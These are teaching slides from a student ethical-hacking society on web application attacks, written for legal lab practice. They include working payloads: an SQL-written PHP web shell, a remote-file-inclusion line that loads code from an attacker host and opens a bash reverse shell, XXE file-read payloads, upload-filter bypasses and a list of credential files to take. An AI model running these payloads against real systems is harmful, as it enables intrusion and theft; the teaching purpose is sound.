

Ethical Student Hackers

Web Application Hacking



The Legal Bit

- The skills taught in these sessions allow identification and exploitation of security vulnerabilities in systems. We strive to give you a place to practice legally, and can point you to other places to practice. These skills should not be used on systems where you do not have explicit permission from the owner of the system. It is VERY easy to end up in breach of relevant laws, and we can accept no responsibility for anything you do with the skills learnt here.
- If we have reason to believe that you are utilising these skills against systems where you are not authorised you will be banned from our events, and if necessary the relevant authorities will be alerted.
- Remember, if you have any doubts as to if something is legal or authorised, just don't do it until you are able to confirm you are allowed to.



Code of Conduct

- Before proceeding past this point you must read and agree to our Code of Conduct - this is a requirement from the University for us to operate as a society.
- If you have any doubts or need anything clarified, please ask a member of the committee.
- Breaching the Code of Conduct = immediate ejection and further consequences.
- Code of Conduct can be found at
<https://shefesh.com/downloads/SESH%20Code%20of%20Conduct.pdf>



The Goal of this Lecture

What are we covering?

- Stack enumeration
- Command injection
- XML External Entity (XXE) processing
- Cross site scripting (XSS)

What can we *not* do?

- Tell you absolutely everything about web application hacking
- Give you a perfect intuition for discovering web app vulnerabilities - this requires a bit of creative thinking!
- Teach you absolutely every defence bypass known to the Cybersecurity community



Web Hacking Methodology

Information Gathering

- Stack Enumeration: what technology is being used?
 - Server headers: is it being served by Nginx? Apache? Werkzeug? Express?
 - What technologies do we expect to see? PHP? ASP? Do routes lack file extensions, suggesting a Rust/Python application? Is it an Electron application?
 - Are there custom Javascript resources? What libraries are imported?
- Resource Discovery with Gobuster/Feroxbuster/Wfuzz
- Subdomain Discovery: use `gobuster vhost -u [URL] -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt` OR `wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.example.com" --hc 400,403 http://example.com`
- Adjacent Services
 - APIs - fuzz endpoints with bad data, look for common parameter names
 - Requests out to other services (Network Tab, Burp)
- Content Security Policies - [How to detect them?](#)
- `wpscan` to enumerate users and plugins, even bruteforce logins!



Command injection - PHP

Our goal with web hacking is often to get **Remote Code Execution** (RCE)

Depending on the underlying language (and OS), different methods and complications may arise

Plenty of reverse shell payloads on [payloadsallthethings](#) and [revshells.com](#) - you may be able to use a one-liner, or may have to rely on a larger file that you upload/force the server to download

Methods: **File Upload** (need a method to trigger the code), **Command Injection** vulnerabilities (see Dynstr on HTB), Arbitrary File Write - and indirectly using file reading to grab SSH keys, passwords, and more

Via SQL Injection: `SELECT "<?php echo(system($_GET['cmd'])); ?>"`
into `OUTFILE '/var/www/html/wordpress/shell.php'`

Techniques we can use

- POST requests
- Cookies
- HTTP headers
- Uploaded files



Technique - File Upload

Via Site Functionality

- Profile Images are a common vector
- Sharing Files in chats etc
- Often have to guess path of upload - enumeration is key!
- May need full path of web application to trigger uploaded files: often `/var/www/html` or `C:\inetpub\wwwroot`

Via Adjacent Services

- E.g. FTP + SMB linked to directory: more common in older applications, such as old IIS servers, where the web application is served out of a directory linked to a file server
- May even chain with another vulnerability to force an admin to download a file via SSRF

Bypass Tips and Tricks

- Null Byte before file extension:
`upload.php%00.png`
- Magic Bytes at start of file to identify it as a different type (see Magic on HTB)
- Change `Content-Type` header in Burp, e.g. to `image/png`



Technique - File Inclusion

Recap - Local File Inclusion is a vulnerability gaining its name from the php `include` function

- LFI seems similar to directory traversal on the surface, where files *outside* the webserver directory can be accessed
- The difference is, PHP code is *executed*
- Files to yoink: `/etc/apache2/sites-enabled/000-default.conf`, `/etc/passwd`, `phpinfo.php`, `.env`, `/home/user/.ssh/id_rsa`, `/proc/net/tcp` OR `C:/ProgramFiles/xampp/apache/conf/httpd.conf`

LFI -> RCE

- Log poisoning (`<?php ?>` in `User-Agent` header, load `/var/log/httpd-access.log`)
- Reading SSH Keys -> SSH Access
- Trigger an uploaded file with a reverse shell
- PHP Wrappers: `php://input/<?php system('id'); ?>`

LFI -> Source Code Disclosure

- PHP code isn't displayed, it's just *executed* - this is good for getting RCE, but not for viewing source code
- Use PHP filters to encode the data we receive in base64 format, and decode it later:

```
php://filter/convert.base64-encode/re  
source=file
```



Technique - File Inclusion

Remote File Inclusion

- If `include` can be *anything*, you can pass it a URL... and host a PHP reverse shell
- `http://[URL]?vulnerable=http://[ATTACKER_IP]/phpcmd.php%00&cmd=bash%20-i%20%3E&%20/dev/tcp/192.168.119.130/4444%200%3E&1`
- Again, less common nowadays - but still relevant, especially if you are looking for an OSCP certification or similar... It is also good to know about, even as just a lesson in what *not* to do when creating a web framework
- Requires `allow_url_include` to be `On` in `php.ini` (deprecated since PHP 7.4)

Disallowed Functions

- Can be defined in `php.ini` with `disable_functions=`
- Enumerate with `phpinfo()` function or by reading `php.ini`
- It's possible to get creative with your PHP function calls - `passthru()`, `shell_exec()`



Techniques - XXE

XML External Entity Injection (XXE)

- Can occur whenever unsanitised XML can be supplied
- XML can tell the server to retrieve an *external* entity

Can lead to:

- RCE
- File Read
- SSRF

Huge list of payloads:

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection>

Practice: BountyHunter (HTB) + [TryHackMe | Mustacchio](#)

Read a File:

```
<?xml version="1.0"
encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]><foo>&xxe;</foo>
```

Or some PHP:

```
<?xml version="1.0"
encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe
SYSTEM
"php://filter/convert.base64-encode/res
ource=index.php"> ]>
<data>
<field>Title &xxe; title</field>
</data>
```



SSRF

Server Side Request Forgery (SSRF) attack

- Change functionality on the server to read or update internal resources
 - Read secrets from server like AWS metadata
 - Access to perform request towards internal services on a private NAT (not exposed to internet)

Example payloads -

<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md>



XSS

Basics: injecting malicious code (usually javascript) into a webpage

- Can then be used to perform **client-side** attacks (i.e. targeting users)
- Can be DOM (page functionality modifies DOM, client side JS), Reflected (passed in request, e.g. URL), or Stored (in a database)

Vectors (basically all due to unsanitised user input):

- User input rendered on page
- Attribute injection
- CVEs (e.g. in [react-marked-markdown](#))
- User Agent strings in logs
- [Prototype Pollution](#) (tampering with methods via JS inheritance)

```
<html>
<body>
<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>

</body>
</html>
```

Example of vulnerable code

<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>

<https://portswigger.net/web-security/cross-site-scripting/preventing>



XSS Payloads

Steal a cookie! (document.cookie)

- Can do it in tricky ways - e.g. ``
- **HTTPOnly** protects against this - use it!

Run more Javascript! Host a script, grab it: `<script src=...>` - good for payloads that change often

CSRF (client-side)! E.g. Have an admin perform an action, such as creating a new account



XSS Defences and Bypasses

Sanitisation - if implemented badly, can be bypassed

- Templating languages and web frameworks often do this by default e.g. Jinja, Laravel
- Filters can be bypassed - if not applied recursively, can build payloads that evaluate to something malicious once sanitised, or use encodings or malformed tags (e.g. `<SCRIPT>alert("XSS")</SCRIPT>"\>`)
- <https://portswigger.net/support/xss-defensive-filters>

You may be injecting *into* another element, e.g. an attribute - be aware of the *context* of your injection, and try to match/close tags - see <https://portswigger.net/support/exploiting-xss-injecting-into-tag-attributes>

Content Security Policies

- Specify which sources a page can execute Javascript from
- Hashes may also be used to check the integrity of a script
- Can often be bypassed e.g. if there is a wildcard in the policy, or a file upload is possible
- <https://portswigger.net/web-security/cross-site-scripting/content-security-policy>
- <https://csp-evaluator.withgoogle.com/>



Nginx Server Misconfigurations

Finally, there are a good few tricks you can use to abuse badly configured Nginx Servers

- Missing Root Location: defaults to /etc/nginx, so a request to /nginx.conf allows reading configuration file
- Off By Slash Vulnerability: allows directory traversal due to how the parser interprets a URL
 - No trailing slash in `location /api { proxy_pass http://server/v1/ }`
 - Request to `http://server/api/path` normalised to `http://server/v1//path`
 - A request to `http://server/api../maliciouspath` normalised to `http://server/v1/../maliciouspath`
 - A lot of this research was done by Orange Tsai - check them out on [twitter](#)
- Even more errors here: <https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/>

If you can leak the Nginx config, you can check for these!

You can also enumerate other local web servers/subdomains if you leak apache and nginx configs



Source Code Exposure

In error messages (especially in debug mode)

In git folders (can be stolen with [git-dumper](#))

In adjacent git instances (such as BitBucket)

Using LFI or Directory Traversals

As you can see, there's an *awful lot* to think about with Web Hacking and it's easy to miss things - You need a good methodology to find things beyond the obvious!

What to look for in source code?

- Logic flaws
- Unsanitised dataflows, such as un-preparedSQL statements
- Insecure comparisons (such as == in PHP)
- Insecure rendering of user input (such as the Markup() function in Flask, or the {{x|safe}} operator in Jinja)
- render_template_string
- Routes! (e.g. in an MVC structure, to help you understand the structure)
- Secrets, such as tokens for signing cookies
- Insecure deserialisations
- Badly written filters on IP restrictions
- Nginx misconfigurations
- ...lots more



Practical

TryHackMe practical - <https://tryhackme.com/room/dvwa>

Some vulnerable websites to mess with

- Google Gruyere
- bWAPP

A practical by Mac - <https://github.com/Twigonometry/Web-Hacking-Demo>



More Resources

LFI

- <https://www.thehacker.recipes/web/inputs/file-inclusion#lfi-to-rce-via-php-wrappers>
- <https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt>

Deserialisation Extra Details

- .NET:
<https://0xdf.gitlab.io/2021/05/29/htb-cereal.html#>
- Java:
<https://snyk.io/blog/serialization-and-deserialization-in-java/>

More XSS Filter Evasion

- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

Disabled Functions Bypasses:

https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable-functions-open_basedir-bypass



Any Questions?



www.shefesh.com
Thanks for coming!

